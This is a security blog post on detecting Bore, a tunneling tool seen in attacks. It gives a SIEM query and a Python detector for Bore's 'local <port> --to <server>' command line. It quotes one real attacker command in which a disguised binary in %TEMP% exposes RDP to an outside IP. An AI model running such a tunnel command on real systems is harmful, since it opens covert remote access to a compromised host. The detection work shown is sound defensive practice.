066. Detecting Bore - Another Tunneling Tool in Adversary's Kit
Hello everyone! Tunneling tools - they are everywhere! Today we'll look at another example observed in the wild - Bore.
It's a small CLI tool that exposes a local port to a remote server (the server then forwards traffic back to the client), so an adversary can reach RDP or SSH on a compromised host from outside. Want an example? Sure, here you go:
"%TEMP%\svhos.exe" local 3389 --to 91.202.233[.]238
Third-rate masquerading, right? A binary named "svhos.exe" dropped in %TEMP% is a sloppy attempt to look like svchost.exe. More useful for us: the "local <port> --to <server>" syntax is Bore's own client invocation, and it survives renaming the binary, so the command line parameters are a good basis for a detection. Here's an example:
event_type: "processcreate"
AND
cmdline.keyword: /.* local .*/
AND
cmdline: (("3389" OR "22") AND "to")
Of course, you can experiment with port numbers and exclusions! Note that the last clause matches "to" because the analyzed cmdline field tokenizes "--to" down to "to"; on a keyword field you would match the literal "--to" instead.
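To show the same logic outside the SIEM, here is an added Python example (not from the post, and not Bore's code) that runs the detection over a handful of constructed process-creation events. It assumes the event fields event_type, image and cmdline, and generalizes the query slightly: it extracts the local port and the --to target, lets you swap the port list or allowlist image paths (the "exclusions" above), and adds a hypothetical heuristic flag for a client whose binary is not called bore/bore.exe.

```python
import ntpath
import re

# Constructed sample process-creation events; field names mirror the query
# in the post (event_type, cmdline). These are not real telemetry.
SAMPLE_EVENTS = [
    {"event_type": "processcreate",                       # the in-the-wild sample
     "image": r"C:\Users\bob\AppData\Local\Temp\svhos.exe",
     "cmdline": r'"%TEMP%\svhos.exe" local 3389 --to 91.202.233[.]238'},
    {"event_type": "processcreate",                       # unrenamed bore, extra flags
     "image": r"C:\Tools\bore.exe",
     "cmdline": "bore.exe local 22 --to tunnel.example.net --port 7835 --secret hunter2"},
    {"event_type": "processcreate",                       # benign, no match
     "image": r"C:\Windows\System32\svchost.exe",
     "cmdline": "svchost.exe -k netsvcs -p"},
    {"event_type": "networkconnect",                      # wrong event type, ignored
     "image": r"C:\Tools\bore.exe",
     "cmdline": "bore.exe local 3389 --to 10.0.0.5"},
    {"event_type": "processcreate",                       # tokens out of order, ignored
     "image": r"C:\Program Files\Git\bin\git.exe",
     "cmdline": "git.exe push --to origin local 3389"},
]

# "local <port> ... --to <server>" in that order, anywhere in the command line.
BORE_CLIENT = re.compile(
    r"(?:^|\s)local\s+(?P<port>\d{1,5})\s+.*?--to\s+(?P<remote>\S+)",
    re.IGNORECASE,
)

DEFAULT_PORTS = {"3389", "22"}   # RDP and SSH, as in the post's query


def match_bore_client(event, ports=DEFAULT_PORTS, excluded_images=()):
    """Return a dict describing the hit, or None if the event is not a Bore client.

    ports=None disables the port filter; excluded_images is a list of path
    prefixes to allowlist (the "exclusions" mentioned in the post).
    """
    if event.get("event_type") != "processcreate":
        return None
    image = event.get("image", "")
    if any(image.lower().startswith(prefix.lower()) for prefix in excluded_images):
        return None
    m = BORE_CLIENT.search(event.get("cmdline", ""))
    if not m:
        return None
    port = m.group("port")
    if ports is not None and port not in ports:
        return None
    name = ntpath.basename(image).lower()
    return {
        "image": image,
        "local_port": port,
        "remote": m.group("remote"),
        # Hypothetical heuristic (not in the post's query): Bore ships as
        # bore / bore.exe, so any other file name with this command line is
        # a renamed copy, like the svhos.exe sample above.
        "renamed_binary": name not in {"bore", "bore.exe"},
    }


def scan(events, **kwargs):
    """Apply match_bore_client to every event and return the hits in order."""
    hits = []
    for event in events:
        hit = match_bore_client(event, **kwargs)
        if hit is not None:
            hits.append(hit)
    return hits


if __name__ == "__main__":
    for hit in scan(SAMPLE_EVENTS):
        print(hit)
```

The regex anchors "local" on a word boundary and requires "--to" after the port, so a command line that merely contains both words in another order (the git example) does not fire; widen the port set or pass ports=None when hunting rather than alerting.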
See you tomorrow!